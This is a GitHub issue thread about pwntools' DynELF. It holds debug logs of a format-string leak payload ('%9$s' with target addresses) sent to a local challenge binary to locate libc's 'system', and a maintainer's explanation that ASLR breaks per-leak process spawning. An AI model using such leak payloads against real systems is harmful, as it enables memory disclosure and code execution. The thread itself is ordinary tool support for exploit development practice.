### ISSUE TITLE
DynELF tried to resolve an illegal address

### ISSUE THREAD

**Issue by tr4v3ler** [Gallopsled/pwntools#2006]
## Debug Output

```sh
$ python3 test.py DEBUG LOG_FILE=log.txt
```

You should see `[DEBUG]` statements that show what's happening behind the scenes:

```
[!] No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked.
[+] Starting local process './pingme' argv=[b'./pingme'] : pid 16319
[DEBUG] Received 0x8 bytes:
    b'Ping me\n'
[DEBUG] Sent 0xd bytes:
    00000000  25 39 24 73  2e 41 41 41  00 80 04 08  0a           │%9$s│.AAA│····│·│
    0000000d
[DEBUG] Received 0xc bytes:
    00000000  7f 45 4c 46  01 01 01 2e  41 41 41 0a               │·ELF│···.│AAA·│
    0000000c
[*] leaking: 0x8048000 --> b'\x7fELF\x01\x01\x01x00'
[*] Stopped process './pingme' (pid 16319)
[◥] Resolving b'system' in b'libc': PT_DYNAMIC count = 0x7808
[+] Starting local process './pingme' argv=[b'./pingme'] : pid 16322
[DEBUG] Received 0x8 bytes:
    b'Ping me\n'
[DEBUG] Sent 0xd bytes:
    00000000  25 39 24 73  2e 41 41 41  1c 80 04 08  0a           │%9$s│.AAA│····│·│
    0000000d
[DEBUG] Received 0xa bytes:
    00000000  34 2e 41 41  41 1c 80 04  08 0a                     │4.AA│A···│··│
    0000000a
[*] leaking: 0x804801c --> b'4x00'
[*] Stopped process './pingme' (pid 16322)
[+] Starting local process './pingme' argv=[b'./pingme'] : pid 16324
[DEBUG] Received 0x8 bytes:
    b'Ping me\n'
[DEBUG] Sent 0xd bytes:
    00000000  25 39 24 73  2e 41 41 41  2c 80 04 08  0a           │%9$s│.AAA│,···│·│
    0000000d
[DEBUG] Received 0xa bytes:
    00000000  08 2e 41 41  41 2c 80 04  08 0a                     │·.AA│A,··│··│
    0000000a
[*] leaking: 0x804802c --> b'\x08x00'
[*] Stopped process './pingme' (pid 16324)
[+] Starting local process './pingme' argv=[b'./pingme'] : pid 16326
[DEBUG] Received 0x8 bytes:
    b'Ping me\n'
[DEBUG] Sent 0xd bytes:
    00000000  25 39 24 73  2e 41 41 41  34 f8 34 38  0a           │%9$s│.AAA│4·48│·│
    0000000d
[*] Process './pingme' stopped with exit code -11 (SIGSEGV) (pid 16326)
[+] Starting local process './pingme' argv=[b'./pingme'] : pid 16329
[DEBUG] Received 0x8 bytes:
    b'Ping me\n'
[DEBUG] Sent 0xd bytes:
    00000000  25 39 24 73  2e 41 41 41  54 f8 34 38  0a           │%9$s│.AAA│T·48│·│
    0000000d
[*] Process './pingme' stopped with exit code -11 (SIGSEGV) (pid 16329)
...
```
I don't know why it resolves illegal addresses like 0x3834f834 or 0x3834f854.
Relevant files are as follows:
[pingme.zip](https://github.com/Gallopsled/pwntools/files/7646651/pingme.zip)

**Comment by Arusekk** [comment]
As far as I can tell, you are spawning a new process each time you leak something. This is incorrect when your process' address space is randomized (ASLR).

**Comment by tr4v3ler** [comment]
> As far as I can tell, you are spawning a new process each time you leak something. This is incorrect when your process' address space is randomized (ASLR).

Thank you for your reply. It's the right answer. But I met a new problem. I found that there was already an [issue](https://github.com/Gallopsled/pwntools/issues/1951).
```
Traceback (most recent call last):
  File "test.py", line 22, in <module>
    system_addr = data.lookup(b'system', b'libc')
  File "/home/tr4v3ler/.local/lib/python3.6/site-packages/pwnlib/dynelf.py", line 582, in lookup
    result = e.symbols[symb]
KeyError: b'system'
[*] Stopped process './pingme' (pid 36572)
```
